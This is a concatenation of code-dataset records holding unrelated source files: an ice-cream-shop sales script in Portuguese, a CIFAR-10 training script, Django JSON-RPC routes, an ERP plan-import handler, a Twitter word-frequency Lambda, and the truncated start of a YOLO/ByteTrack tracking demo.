= \"|\"\n listavariavel = listavariavel.replace(remover,\";\")\n\n\n # abrir ou criar arquivo\n arquivo = open('pedidosdetalhe.csv', 'a',encoding=\"utf8\", newline=\"\")\n\n # escrever linha\n arquivo.write(\"%s\" % str(listavariavel))\n\n # fechar\n arquivo.close()\n\n\n\n\n\n\n\n\n\n\n # gerar relatorio de produtos mais vendidos\n #maisvendido(listavariavel)\n\n #criarhtml(str(numeropedido))\n\n\n\n# gerar relatorio de mais vendidos / produtos mais vendidos\ndef venda_por_produto(n):\n \n import io\n import codecs\n\n arq = open('pedidosdetalhe.csv', 'r', encoding=\"utf8\")\n texto = arq.read()\n\n arq.close()\n\n dic = dict()\n\n texto = texto.replace('nome_produto', \"\")\n # remove letra misnusculas, numeros, espaços, #,#\n b = \",1234567890a b c d e f g h i j k l m n o p q r s t u v w x y z \\n :\"\n for i in range(0, len(b)):\n texto = texto.replace(b[i], \"\")\n\n\n # remover textos especiais\n texto = texto.replace('SEMCPF', \"\")\n texto = texto.replace('p', \"\")\n texto = texto.replace('LIVRE', \"\")\n texto = texto.replace('COMCOBERTURAEXTRA', \"\")\n texto = texto.replace('SEMCOBERTURAEXTRA', \"\")\n texto = texto.replace(\"\",'')\n\n\n # separar texto\n listfile = texto.split(';')\n listfile2 = listfile\n\n\n\n for item in listfile:\n Contitem = 0\n for i in listfile2:\n if item == i:\n Contitem = Contitem + 1\n dic[i] = Contitem\n\n\n\n # excluir dic P e DIC ''\n dic['P'] = 1\n del dic['P']\n del dic['']\n\n\n # str do dic em uma variavel\n textodic = str(dic)\n\n\n # remover caracteres\n b = '\\'}{ '\n for i in range(0, len(b)):\n textodic = textodic.replace(b[i], \"\")\n\n\n\n textodic = textodic.replace(',', \"\\n\")\n\n\n escrever('PRODUTO | QUANTIDADE \\n'+textodic)\n continua= input('ENTER PARA CONTINUAR')\n return menu()\n\n\n# html na tela\ndef criarhtml(numero):\n pedido = str(numero)\n # linha para salvar\n html = '<!DOCTYPE html>\\n<html>\\n<head>\\n<title>'+str(pedido)+'\\n\\n\\n

'+str(pedido)+'

\\n

'+str(pedido)+'

\\n\\n'\n\n # abrir ou criar arquivo\n arquivo = open('index.html', 'a', encoding=\"utf8\")\n\n # escrever linha\n arquivo.write(\"%s\" % html)\n\n # fechar\n arquivo.close()\n\n #abrirfoto('h')\n\n# abrir foto no webbrowser\ndef abrirfoto(numero):\n import webbrowser\n new = 2;\n\n\n\n # [1] CHOCOLATE\n if numero == 1:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [2] MISTO\n if numero == 2:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [3] CREME\n if numero == 3:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [4] triplo chocolate Kopenhagen\n if numero == 4:\n url = \"https://uploads.metropoles.com/wp-content/uploads/2018/03/22161224/kopenhagen1.jpg\"\n # [5] Kit Kat\n if numero == 5:\n url = \"http://s3.id5.com.br/maceioshopping/uploads/2016/07/McFlurryKitKat.jpg\"\n\n # [e] extra\n if numero == 'e':\n url=\"http://caramelodrama.com/wp-content/uploads/2018/01/melting-choc-istock.jpg\"\n\n # [e] extra\n if numero == 'h':\n url = \"file:///home/breno/BRENO/programacao/python/PROJETO%20SORVETERIA/index.html\"\n\n\n webbrowser.open(url, new=new)\n time.sleep(2)\n\n# gerar preço total\ndef calcularprecototal(QTDO, SABOR):\n CONTA = float(0)\n if SABOR == 1: # cho 3rs\n CONTA = float(QTDO * 3.5)\n escrever('preço 3,50')\n if SABOR == 2: # mis 4rs\n CONTA = float(QTDO * 4)\n escrever('preço 4,00')\n if SABOR == 3: # cre 5rs\n CONTA = float(QTDO * 4.5)\n escrever('preço 4,50')\n\n if SABOR == 4: # cre 5rs\n CONTA = float(QTDO * 8.5)\n escrever('preço 8,50')\n\n if SABOR == 5: # cre 5rs\n CONTA = float(QTDO * 9.0)\n escrever('preço 9,00')\n\n return CONTA\n\n# escrever texto\ndef escrever(texto):\n texto= str(texto)\n tamanhotexto = len(texto) + 4\n nomecaixa = texto.upper()\n print('~' * tamanhotexto)\n print(\" \", nomecaixa)\n print('~' * tamanhotexto)\n\n# sair do sistema\ndef sair(d):\n # limpar\n limpar()\n menu()\n\n# gerar numero do pedido\ndef numeropedido(m, h, d, me, an):\n numero = (h + d + me + an) * m\n pedido = str(numero)\n escrever('PEDIDO: ' + pedido)\n return pedido\n\n# inicio do programa\ndef menu():\n limpar()\n op = \"\"\n while op == \"\":\n limpar()\n escrever(\"NOVA VENDA [1]\")\n escrever(\"PEDIDO FEITO [2]\")\n escrever(\"PRODUTOS [3]\")\n escrever(\"relatorios [4]\")\n op = str(input(''))\n if op == \"1\" or op == \"2\" or op == \"3\" or op == \"4\":\n if op == \"2\":\n return chamarpedido(1)\n if op == \"1\":\n return ganhardesconto(1)\n if op == \"3\":\n return produto(1)\n if op == \"4\":\n return venda_por_produto(1)\n else:\n op == \"\"\n\n# tela produto\ndef produto(p):\n limpar()\n\n escrever(\"CADASTRAR PRODUTO [1]\")\n escrever(\"EXCLUIR PRODUTO [2]\")\n escrever(\"VOLTAR [3]\")\n op = str(input(''))\n if op == \"1\" or op == \"2\" or op == \"3\":\n if op == \"1\":\n return cadastrarproduto(1)\n if op == \"2\":\n return excluirproduto(1)\n if op == \"3\":\n return menu()\n else:\n op == \"\"\n\n# validar nomes\ndef validarnomes(nome):\n nome = ' '\n c = 0\n while len(nome) < 3:\n if c >= 1:\n escrever('DIGITE CORRETAMENTE')\n nome = input('')\n nomecaixa = nome.upper()\n return nomecaixa\n\n#cadastrar produto\ndef cadastrarproduto(p):\n limpar()\n escrever('CADASTRAR PRODUTO')\n escrever('NOME DO PRODUTO: ')\n nome = validarnomes(1)\n\n nome=nome.replace(' ','_')\n\n\n valor = 0.0\n while valor < 0.1:\n escrever('VALOR DE VENDA')\n print('EXEMPLO: 5,90')\n valoaux = input('')\n valoaux = valoaux.replace(',','.')\n valor = float(valoaux)\n\n\n # opcoes de estoque livre ou com quantidade de estoque\n escrever('cadastrar quantidade do produto? \\n sim [1] | não [2]')\n auxopint = input('')\n opca = int(auxopint)\n while opca < 1 or opca > 2:\n opca = int(input(''))\n\n if opca == 1:\n escrever('estoque')\n quantidadeestoque = int(input(''))\n\n if opca == 2:\n quantidadeestoque = 'LIVRE'\n\n\n escrever('CONFIRMAR PRODUTO [1]')\n escrever('CANCELAR [2]')\n op = str(input(''))\n if op == \"1\" or op == \"2\":\n if op == \"1\":\n return confirmarproduto(nome, valor,quantidadeestoque )\n if op == \"2\":\n return menu()\n else:\n op == \"\"\n\n# verificar produto no txt\ndef confirmarproduto(nome, valor, quantidadeestoque):\n with open('produtos.txt', encoding=\"utf8\") as f:\n for l_num, l in enumerate(f, 1): # percorrer linhas e enumera-las a partir de 1\n if nome in l: # ver se palavra esta na linha\n escrever(nome + ' JÁ ESTÁ CADASTRADO')\n continua=input('ENTER PARA CONTINUAR')\n cadastrarproduto(1)\n break\n\n else: # caso não haja break\n\n # abrir ou criar arquivo\n arquivo = open('produtos.txt', 'a', encoding=\"utf8\", newline=\"\")\n\n # criar linha\n liconfirmarprodutonha = str(nome)+'|'+str(valor)+'|'+str(quantidadeestoque)+'\\n'\n\n\n # escrever linha\n arquivo.write(\"%s\" % liconfirmarprodutonha)\n\n # fechar\n arquivo.close()\n\n escrever('PRODUTO CADASTRADO')\n input('ENTER PARA CONTINUAR')\n\n produto(1)\n\n# exibir produtos\ndef exibirprodutos(p):\n limpar()\n f = open('produtos.txt', 'r', encoding=\"utf8\")\n n = 0\n for line in f:\n n = n + 1\n print(str(n) +' | '+line)\n return escrever(str(n)+' PRODUTOS CADASTRADOS')\n\n# validar numero de opcao\ndef validarnumero(numero):\n numero=10\n while numero != 0 or numero != 1 or numero != 2 or numero != 3 or numero != 4 or numero != 5 or numero != 6 or numero != 6 or numero != 8 or numero != 9:\n escrever('OPÇÃO INVALIDA')\n escrever('DIGITE NOVAMENTE')\n auxnumero = str(int(''))\n numero = int(auxnumero)\n\n# add produto no pedido\ndef addproduto(produto):\n exibirprodutos(1)\n escrever('NUMERO DO PRODUTO: : ')\n index_linha = 0\n index_linha = int(input(''))\n\n firstLine = ' '\n arq = open('produtos.txt', 'r', encoding=\"utf8\")\n texto = arq.readlines()\n cont = 1\n for linha in texto:\n if index_linha == cont:\n linhadoproduto = linha\n arq.close()\n\n\n\n # logica para exluir caracteres\n # excluir o \"pular linha\"\n b = \"n\\n\\n\"\n for i in range(0, len(b)):\n linhadoproduto = linhadoproduto.replace(b[i], \"\")\n\n\n return linhadoproduto,\n\n cont = cont + 1\n arq.close()\n return escrever('produto não encontrado')\n\n# excluir produto do txt\ndef excluirproduto(p):\n exibirprodutos(1)\n escrever('NUMERO DO PRODUTO ou VOLTAR [0]')\n\n index_linha = str(input(''))\n if index_linha == '0':\n menu()\n\n index_linha = int(index_linha)- 1\n path = 'produtos.txt'\n\n with open(path,'r', encoding=\"utf8\") as f:\n texto=f.readlines()\n with open(path,'w', encoding=\"utf8\") as f:\n for i in texto:\n\n if texto.index(i)==index_linha:\n f.write('')\n escrever('EXCLUIDO!')\n else:\n if index_linha == i:\n f.write('excluido')\n else:\n f.write(i)\n\n\n menu()\n\n# diretorio do PDF\ndef meudiretorio(caminho):\n\n # importar data\n from datetime import datetime\n now = datetime.now()\n\n # criar diretorio\n #dirTemp = './'+str(now.year)+'/'+str(now.month)+'/'+str(now.day)+'/'\n dirTemp = './PEDIDOS/'\n return dirTemp\n\n# gerar um pdf detalhado do pedido para inprimir e dar para o cliente retira no balcao o seu pedido\ndef gerarpdfdetalhado(nome, pedido, lista,tsub, tdesc,valortotal, hora, ddd, tel):\n\n # enviar via whatsapp\n limpar()\n escrever('envar por whatsapp: sim [1] | não [2]')\n opwhats = int(input(''))\n\n\n if opwhats == 1:\n\n if len(str(tel))<3:\n tel = ''\n escrever('telefone:')\n tel = str(input(''))\n\n enviarporwhatsapp(nome, pedido, lista, tsub, tdesc, valortotal, hora, ddd, tel)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n from reportlab.pdfgen import canvas\n\n # organizar texto\n pedidoPDF = 'PEDIDO: ' + str(pedido)\n nomePDF = 'NOME: ' + str(nome)\n\n\n sub = 'SUBTOTAL: ' + \"%.2f\" % float(tsub)\n desc = 'DESCONTO: ' + \"%.2f\" % float(tdesc)\n valortotalPDF = 'TOTAL: ' +\"%.2f\" % float(valortotal)\n\n\n\n\n horaPDF = str(hora)\n listaPDF = 'DESCRIÇÃO: ' + str(lista)\n\n diretorio=meudiretorio(1)\n\n\n # escrever no pdf\n c = canvas.Canvas(diretorio+str(pedido) + '_' + nome + '_' + \"%.2f\" % float(valortotal) + '.pdf')\n c.drawString(440, 800, str(pedidoPDF))\n c.drawString(30, 800, str(nomePDF))\n c.drawString(80, 780, str(sub))\n c.drawString(200, 780, str(desc))\n c.drawString(320, 780, str(valortotalPDF))\n c.drawString(330, 800, str(horaPDF))\n\n\n tam = 580\n c.drawString(60, 600, 'DESCRIÇAO: ')\n\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n\n for um in add:\n minhalinha = minhalinha + str(um)\n\n # remover os caracteres da string\n remover = \"||\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover, \"\")\n\n # remover os caracteres da string\n remover = \"\\'\\\"][,)( \"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"|\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \" | \")\n\n # remover os caracteres da string\n remover = \".\"\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], \",\")\n\n c.drawString(70, tam, str(minhalinha))\n tam = tam - 20\n\n\n\n\n # salvar no pdf\n c.save()\n\n\n\n\n\ndef enviarporwhatsapp(nome, pedido, lista, tsub, tdesc, valortotal, hora, ddd, tel):\n\n tel = '987088707'\n ddd = '11'\n numero ='550'+str(ddd)+str(tel)\n print(numero)\n driver.get(\"https://api.whatsapp.com/send?1=pt_BR&phone=\"+str('55011987088707'))\n time.sleep(5)\n try:\n driver.switch_to_alert().accept()\n alert = driver.switch_to.alert()\n alert.accept()\n except Exception as e:\n pass\n\n time.sleep(3)\n btn = driver.find_element_by_xpath('//*[@id=\"action-button\"]')\n btn.click()\n time.sleep(5)\n\n escrever = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\n escrever.click()\n escrever.send_keys('teste')\n\n\n\n\n\n\n\n\nlimpar()\nescrever('whatsapp: sim [1] | não [2]')\nwhatsapp = int(input(''))\n\n\nif whatsapp == 1:\n limpar()\n\n from selenium import webdriver\n\n\n from selenium.webdriver.common.keys import Keys\n driver = webdriver.Chrome()\n driver.get('https://web.whatsapp.com/')\n\n\n\n# não deixar o programa fechar\ncontinua = True\nwhile continua:\n limpar()\n menu()\n","repo_name":"DeveloperBreno/Projeto-sistema-Fast-Foot","sub_path":"sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":24572,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35071819505","text":"import argparse\nfrom datetime import datetime\nimport os\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom model import CNN\nfrom dataset import CIFAR10Dataset\nfrom generals import get_path\n\n# TRAINING_SET = './train_cifar10_100.csv'\n# TRAINING_SET = './train_cifar10_1000.csv'\nTRAINING_SET = './train_cifar10_full.csv'\n\n# TEST_SET = './test_cifar10_1000.csv'\nTEST_SET = './test_cifar10_full.csv'\n\ndef train(args, model, device):\n epochs, optimizer, lr, batch_size, train_data, test_data, num_workers \\\n = args.epochs, args.optimizer, args.lr, args.batch_size, args.train_data, args.test_data, args.num_workers\n \n train_path = TRAINING_SET if train_data is None else train_data\n test_path = TEST_SET if test_data is None else test_data\n\n train_set = CIFAR10Dataset(train_path, training=True)\n train_loader = DataLoader(train_set, batch_size=batch_size, num_workers=num_workers, shuffle=True)\n\n model.train()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n optim = torch.optim.Adam(model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optim, epochs)\n scaler = torch.cuda.amp.GradScaler()\n\n save_dir = get_path(os.path.join(os.getcwd(), 'runs', args.model_name))\n save_dir.mkdir(parents=True, exist_ok=True)\n last, best = save_dir / 'last.pt', save_dir / 'best.pt'\n\n result = save_dir / 'result.txt'\n\n nb = len(train_loader)\n\n best_val_acc = 0\n\n for epoch in range(epochs):\n\n pbar = tqdm(enumerate(train_loader), total=nb)\n \n for i, (images, labels) in pbar:\n optim.zero_grad()\n\n images, labels = images.to(device), labels.to(device)\n with torch.cuda.amp.autocast():\n preds = model(images)\n loss = criterion(preds, labels)\n \n scaler.scale(loss).backward()\n scaler.step(optim)\n scaler.update()\n\n pbar.set_description(f'[Training] Loss: {loss:.5f}')\n \n scheduler.step()\n\n val_acc, val_loss = val(args, model, device)\n \n if val_acc > best_val_acc:\n best_val_acc = val_acc\n \n print('*'*20)\n print(f'[New Best Accuracy] {val_acc*100:.5f}% on epoch: {epoch}')\n\n ckpt = {\n 'epoch': epoch,\n 'accuracy': val_acc,\n 'model': model,\n 'optimizer': optim.state_dict(),\n 'opt': args,\n 'date': datetime.now().isoformat()\n }\n\n torch.save(ckpt, best)\n \n print(f'Train ended on {epoch}')\n ckpt = {\n 'epoch': epoch,\n 'accuracy': val_acc,\n 'model': model,\n 'optimizer': optim.state_dict(),\n 'opt': args,\n 'date': datetime.now().isoformat()\n }\n\n torch.save(ckpt, last)\n\n result_txt = f'''\n Model Name: {args.model_name}\n Epochs: {epochs}\n Final loss: {val_loss}\n Best validation accuracy: {best_val_acc} \n '''\n with open(result, 'w') as f:\n f.write(result_txt)\n\n\n\n\ndef val(args, model, device):\n epochs, optimizer, lr, batch_size, train_data, test_data, num_workers \\\n = args.epochs, args.optimizer, args.lr, args.batch_size, args.train_data, args.test_data, args.num_workers\n\n test_path = TEST_SET if test_data is None else test_data\n\n test_set = CIFAR10Dataset(test_path, training=False)\n test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=num_workers, shuffle=False)\n\n model.eval()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n\n n = len(test_set) \n nb = len(test_loader)\n\n pbar = tqdm(enumerate(test_loader), total=nb)\n\n loss = 0\n acc = 0\n \n for epoch, (images, labels) in pbar:\n \n b = len(images)\n\n images, labels = images.to(device), labels.to(device)\n \n preds = model(images)\n \n batch_loss = criterion(preds, labels)\n batch_acc = torch.sum(torch.argmax(preds, dim=-1)==torch.argmax(labels, dim=-1)) / b\n loss += criterion(preds, labels) * b\n acc += batch_acc * b\n\n pbar.set_description(f'[Validation] Acc: {batch_acc*100:.5f}%, Loss: {batch_loss:.5f}')\n \n loss /= n\n acc /= n\n\n print(f'[Validation] total accuracy: {acc*100:.5f}%, total loss: {loss:.5f}')\n\n del test_set, test_loader\n\n return acc.cpu().detach().numpy(), loss.cpu().detach().numpy()\n\n\n\ndef main(opt):\n \n device = torch.device(opt.device)\n model = CNN().to(device)\n\n train(opt, model, device)\n \ndef parse_opt(known=False):\n parser = argparse.ArgumentParser()\n parser.add_argument('--epochs', type=int, default=100, help='number of epochs')\n parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')\n parser.add_argument('--optimizer', type=str, choices=['SGD', 'Adam', 'AdamW'], default='Adam', help='optimizer')\n parser.add_argument('--batch-size', type=int, default=16, help='batch size')\n parser.add_argument('--train-data', type=str, default='./train_cifar10_full.csv', help='ltrain data')\n parser.add_argument('--test-data', type=str, default='./test_cifar10_full.csv', help='test data')\n parser.add_argument('--device', type=str, default='cuda:0', help='cuda device, cuda:0 or cpu')\n parser.add_argument('--num-workers', type=int, default=6, help='number of workers')\n parser.add_argument('--model-name', type=str, default='CNN_big', help='name to save model')\n\n return parser.parse_known_args()[0] if known else parser.parse_args()\n\n\ndef run(**kwargs):\n opt = parse_opt(True)\n for k, v in kwargs.items():\n setattr(opt, k, v)\n main(opt)\n return opt\n\nif __name__ == \"__main__\":\n opt = parse_opt()\n main(opt)","repo_name":"rlaskarl77/ROBOTAI2022FALL","sub_path":"hw5/q2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"15022733202","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom . import views\nfrom .models import Link\nfrom jsonrpc.backend.django import api\nfrom lib import previews\nfrom lib.dubbels import get_all_for_pid\nfrom django.forms.models import model_to_dict\n\nurlpatterns = [\n url('^(?:model-(?P\\w+))?/?$', views.index, name='index'),\n path('loading', views.loading, name='loading'),\n url(r'stats(?:-(?P\\w+))?(?:/(?P[\\w]+)\\.(?P\\w{3}))?$', views.stats, name='stats'),\n url('evaluation(?:/(?P.+))?$', views.evaluation, name='evaluation'),\n # url('progress(?:-(?P[a-z]+))?.png$', views.progress, name='progress'),\n url('^info(?:/model-(?P[^/]+))?/(?P[^/]+)/?$', views.pid, name='pid'),\n url('^info(?:/model-(?P[^/]+))?/(?P[^/]+)/(?P[^/]+)/(?P.+)$', views.info, name='info'),\n]\n\n\n@api.dispatcher.add_method\ndef get_info(pid, words=[], request=None):\n return previews.get_info(pid, words)\n\n\n@api.dispatcher.add_method\ndef ping(request=None):\n return 'pong'\n\n\n@api.dispatcher.add_method\ndef update_item(model, pid, nmlid, status, kind, extras, request=None):\n model = views.get_model(model)\n\n # update the dubbels as well\n pids = get_all_for_pid(pid)\n items = model.objects.filter(pid__in=pids, nmlid=nmlid)\n items.update(status=status, kind=kind, extras=extras)\n return len(items)\n\n\n@api.dispatcher.add_method\ndef get_kinds(kind='', model=None, request=None):\n model = views.get_model(model)\n return [d['kind'] for d in model.objects.values('kind').distinct()]\n\n\ndef linkmodel_to_dict(model):\n result = model_to_dict(model)\n properties = ('url', 'status_class', 'status_text')\n for prop in properties:\n result[prop] = getattr(model, prop)\n return result\n\n\n@api.dispatcher.add_method\ndef get_items(amount=1, model=None, order_by='?', request=None):\n model = views.get_model(model)\n links = model.objects.filter(status=model.UNDEFINED, score__lt=0.99).order_by(order_by)[0:amount]\n return list(map(linkmodel_to_dict, links))\n\n","repo_name":"viaacode/nvdgo-namelinking","sub_path":"pywebserver/attestation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"32943870968","text":"from mg_app_framework import HttpBasicHandler, MesCode, get_logger\nfrom plan_management.handlers.utils import log_exception, get_plan_db_collection, PlanStatusType, PlanType, ErpPlanStatus\nfrom datetime import datetime\nfrom pymongo import ReplaceOne\nimport json\n\n\nclass ErpPlanTransferHandler(HttpBasicHandler):\n async def post_process(self):\n \"\"\"\n url: POST /api/plan_management/erp_plan/transfer\n 发送数据app发往计划管理app数据结构:\n {\n \"plan_list\":\n [\n {\n \"task_no\": \"A181120203-00\", //字段task_serial, 必要字段\n \"task_type\": \"常规产品\", //字段task_type, 可选字段\n \"task_date\": \"2019-01-09\", //字段task_date, 可选字段\n \"material_code\": \"materiel_t901h40adc12v4_23\", //字段product_code, 必要字段\n \"material_name\": \"T901H40ADC12V 4脚 23规格\", //字段product_name, 必要字段\n \"material_spec\": \"NNC\", //字段product_spec, 可选字段\n \"material_unit\": \"个\", //字段product_unit, 必要字段\n \"plan_count\": 1000, //字段plan_num, 必要字段\n \"plan_no\": \"A181120203-00\", //字段plan_serial, 可选字段\n \"plan_start_date\": \"2019-01-10\", //字段plan_start, 必要字段\n \"plan_end_date\": \"2019-01-12\", //字段plan_end, 必要字段\n \"real_start_date\": \"2019-01-10\", //字段real_start, 可选字段\n \"real_end_date\": \"2019-01-12\", //字段real_end, 可选字段\n \"workshop_name\": \"六车间\", //字段work_center, 必要字段\n \"create_time\": \"2019-01-10\", //字段chage_time, 必要字段\n \"erp_plan_status\": \"投放\", //字段plan_status对应状态文字(1.锁定,2.确认,3.下达,4.投放,5.流转,6.暂停, 7.完工), 可选字段\n \"plan_status\": \"可下发\" //3种状态,可下发,已完成和不可下发, 这个字段值由上一个字段erp_plan_status决定\n }\n ]\n }\n :return:\n {\n \"code\":\"success\",\n \"info\": \"\",\n \"data\": null\n }\n \"\"\"\n from plan_management.handlers.sds import get_material_id_code_dict, get_workshop_name_code_dict, get_custom_field_config\n etl_req_data = json.loads(self.request.body)\n plan_data_list = etl_req_data['plan_list']\n plan_collection = get_plan_db_collection()\n try:\n if plan_data_list:\n material_id_code_dict = get_material_id_code_dict()\n workshop_name_code_dict = get_workshop_name_code_dict()\n custom_field_config = get_custom_field_config()\n plan_upsert_list = []\n for plan_data in plan_data_list:\n task_no = plan_data['task_no']\n existing_plan = await plan_collection.find_one({'task_no': task_no})\n # 处理定制字段, 如果一个定制字段对应的计划不存在,且该字段不在请求数据字段中,则置空\n if custom_field_config:\n for field_code in custom_field_config:\n if not existing_plan and field_code not in plan_data:\n plan_data[field_code] = ''\n\n # ERP传过来的物料编码对应主数据内的物料编号,需要转为对应的物料编码\n # 暂时完全使用erp过来的编码,后期如果有需求更新再改\n # material_identifier = plan_data['material_code']\n # if material_identifier in material_id_code_dict:\n # material_code = material_id_code_dict[material_identifier]\n # else:\n # # 如果物料编码找不到则直接保存\n # material_code = material_identifier\n # plan_data['material_code'] = material_code\n\n # 获取车间编码\n workshop_name = plan_data['workshop_name']\n workshop_code = workshop_name_code_dict[workshop_name]\n plan_data['workshop_code'] = workshop_code\n\n # ERP传过来的计划状态需要转为计划管理内部的状态值\n plan_status = plan_data['plan_status']\n if plan_status == ErpPlanStatus.can_dispatch.value:\n plan_data['plan_status'] = PlanStatusType.not_dispatched.value\n elif plan_status == ErpPlanStatus.cant_dispatch.value:\n plan_data['plan_status'] = PlanStatusType.cant_dispatch.value\n elif plan_status == ErpPlanStatus.finished.value:\n plan_data['plan_status'] = PlanStatusType.finished.value\n\n # 添加其他必须字段\n plan_data['comment'] = ''\n plan_data['product_line_code'] = ''\n plan_data['operator'] = ''\n # 录入时间写入当前时间\n if not existing_plan:\n # 仅当该计划不存在时写入录入时间\n plan_data['create_time'] = str(datetime.now())\n plan_data['modified_time'] = ''\n else:\n # 如果该计划已存在,则需要更新修改时间\n plan_data['modified_time'] = str(datetime.now())\n plan_data['dispatch_time'] = ''\n plan_data['qualified_count'] = 0\n plan_data['unqualified_count'] = 0\n plan_data['plan_type'] = PlanType.erp_import.value\n\n update_query = {'task_no': task_no}\n plan_upsert_data = ReplaceOne(update_query, plan_data, upsert=True)\n plan_upsert_list.append(plan_upsert_data)\n\n if plan_upsert_list:\n # 批量更新计划\n plan_collection.bulk_write(plan_upsert_list)\n self.send_response_data(MesCode.success, plan_data_list, '')\n get_logger().info('从ERP更新计划数据成功:{}'.format(plan_data_list))\n except Exception as e:\n log_exception(e, '从ERP更新计划数据失败')\n self.send_response_data(MesCode.fail, None, '从ERP更新计划数据失败')\n","repo_name":"angiegigishang/workPractice","sub_path":"electricalindustry/plan_management/server/src/plan_management/handlers/http_handler/etl_process_handler.py","file_name":"etl_process_handler.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25959272345","text":"import json\nimport os\nimport requests\nimport tweepy\nimport collections\n\n\ndef lambda_handler(event, context):\n\n try:\n query = event[\"queryStringParameters\"][\"id\"]\n except Exception as e:\n print(str(e))\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\"message\": str(e)}),\n }\n\n API_KEY = os.getenv(\"API_KEY\")\n API_ACCESS = os.getenv(\"API_ACCESS\")\n ACCESS_TOKEN = os.getenv(\"ACCESS_TOKEN\")\n ACCESS_TOKEN_SECRET = os.getenv(\"ACCESS_TOKEN_SECRET\")\n\n # Twitter API credentials\n auth = tweepy.OAuthHandler(API_KEY, API_ACCESS)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n api = tweepy.API(auth)\n item_count = 100\n\n # tweet_list = [\n # tweet.text\n # for tweet in tweepy.Cursor(api.user_timeline, id=query).items(item_count)\n # if (list(tweet.text)[:2] != [\"R\", \"T\"]) & (list(tweet.text)[0] != \"@\")\n # ]\n\n tweet_list = [\n tweet.text\n for tweet in tweepy.Cursor(api.search_tweets, q=query, lang=\"en\").items(item_count)\n if (list(tweet.text)[:2] != [\"R\", \"T\"]) & (list(tweet.text)[0] != \"@\")\n ]\n\n temp_tweet = \" \".join(tweet_list)\n temp_list = temp_tweet.split(\" \")\n remove_list = [\n query,\n \"a\",\n \"to\",\n \"for\",\n \"in\",\n \"of\",\n \"the\",\n \"and\",\n \"is\",\n \"on\",\n \"I\",\n \"you\",\n \"it\",\n \"that\",\n \"this\",\n \"with\",\n \"at\",\n \"from\",\n \"by\",\n \"are\",\n \"as\",\n \"be\",\n \"have\",\n \"or\",\n \"an\",\n \"will\",\n \"my\",\n \"can\",\n \"not\",\n \"but\",\n \"was\",\n \"what\",\n \"your\",\n \"all\",\n \"about\",\n \"there\",\n \"if\",\n \"when\",\n \"how\",\n \"up\",\n \"out\",\n \"so\",\n \"some\",\n \"he\",\n \"she\",\n \"they\",\n \"me\",\n \"we\",\n \"us\",\n \"our\",\n \"their\",\n \"them\",\n \"his\",\n \"her\",\n \"their\",\n \"its\",\n \"am\",\n \"do\",\n \"does\",\n \"did\",\n \"doing\",\n \"done\",\n \"into\",\n \"than\",\n \"too\",\n \"very\",\n \".\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"-\",\n \"\",\n ]\n\n temp_list = [i for i in temp_list if i not in remove_list]\n counter = collections.Counter(temp_list)\n counter = counter.most_common(10)\n print(counter)\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"POST,GET,PUT,DELETE\",\n \"Access-Control-Allow-Headers\": \"Content-Type\",\n },\n \"body\": json.dumps({\"tweetList\": tweet_list, \"counter\": counter}),\n }\n","repo_name":"hasesho05/backend-WordChecker-on-Twitter","sub_path":"hello_world/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"13387554832","text":"import argparse\r\nimport os\r\nimport time\r\nfrom pathlib import Path\r\nimport numpy as np\r\nimport cv2\r\nimport torch\r\nimport torch.backends.cudnn as cudnn\r\nfrom numpy import random\r\nfrom models.experimental import attempt_load\r\nfrom utils.datasets import LoadStreams, LoadImages\r\nfrom utils.plots import plot_one_box\r\nfrom utils.torch_utils import time_synchronized, TracedModel\r\nimport time \r\nfrom ByteTrack.tracker.byte_tracker import BYTETracker\r\nfrom utils.visualize import plot_tracking\r\nfrom ByteTrack.tracking_utils.timer import Timer\r\nfrom DetectModel import Detect\r\nimport json\r\ndef track_demo(video_path=\"dataset/Drone-Detection&Tracking/test/01_2192_0001-1500\",save_txt=True):\r\n txt_dir = \"result_bt\"\r\n if not os.path.exists(txt_dir):\r\n os.makedirs(txt_dir)\r\n \r\n # Detected\r\n conf_thres = 0.1\r\n iou_thres = 0.25\r\n img_size = 640\r\n weights = \"runs/train/exp/weights/best.pt\"\r\n device = 0\r\n half_precision = True\r\n deteted = Detect(weights, device, img_size, conf_thres, iou_thres, single_cls=False, half_precision=half_precision, trace= False)\r\n \r\n # 